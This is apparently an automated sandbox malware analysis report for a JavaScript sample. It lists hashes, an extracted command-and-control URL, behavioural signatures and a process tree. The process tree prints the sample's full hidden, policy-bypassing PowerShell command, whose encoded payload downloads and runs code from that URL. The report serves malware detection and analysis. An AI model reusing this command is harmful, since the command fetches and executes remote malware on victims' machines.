Analysis
-
max time kernel
43s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
17/10/2022, 17:39
Static task
static1
Behavioral task
behavioral1
Sample
5a8f908de929fa670000c3c72a900288.js
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
5a8f908de929fa670000c3c72a900288.js
Resource
win10v2004-20220812-en
General
-
Target
5a8f908de929fa670000c3c72a900288.js
-
Size
66KB
-
MD5
5a8f908de929fa670000c3c72a900288
-
SHA1
b62fe78ce6c9cfe5040a8e94c522dcff7a43de4f
-
SHA256
2ecee022c36e71313e1af91b039671ddabf56f2f28db3141e48d15dccf96064f
-
SHA512
73cdc14322e7570fd835480e09211c3211eee9503368ec8a2567aec5b0c0f15c8628640f7cdab3de28a681cf2ef914b3c6874b48fa111ff6478d5bffa39c2543
-
SSDEEP
1536:je6R4Qklp7XoRZ93vd3LjUlqFF0gx4iwgQBk6buzxF8z:jxPklp7cr3vJ/UlqFKgxtwgQBfbUS
Malware Config
Extracted
http://8ltd8.com/doc/index.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2016 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2016 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1932 wrote to memory of 1908 1932 wscript.exe 22 PID 1932 wrote to memory of 1908 1932 wscript.exe 22 PID 1932 wrote to memory of 1908 1932 wscript.exe 22 PID 1908 wrote to memory of 2016 1908 cmd.exe 30 PID 1908 wrote to memory of 2016 1908 cmd.exe 30 PID 1908 wrote to memory of 2016 1908 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\5a8f908de929fa670000c3c72a900288.js1⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C poWeRShell -NOp -w HidDEn -ep byPasS -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AOABsAHQAZAA4AC4AYwBvAG0ALwBkAG8AYwAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=2⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWeRShell -NOp -w HidDEn -ep byPasS -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AOABsAHQAZAA4AC4AYwBvAG0ALwBkAG8AYwAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-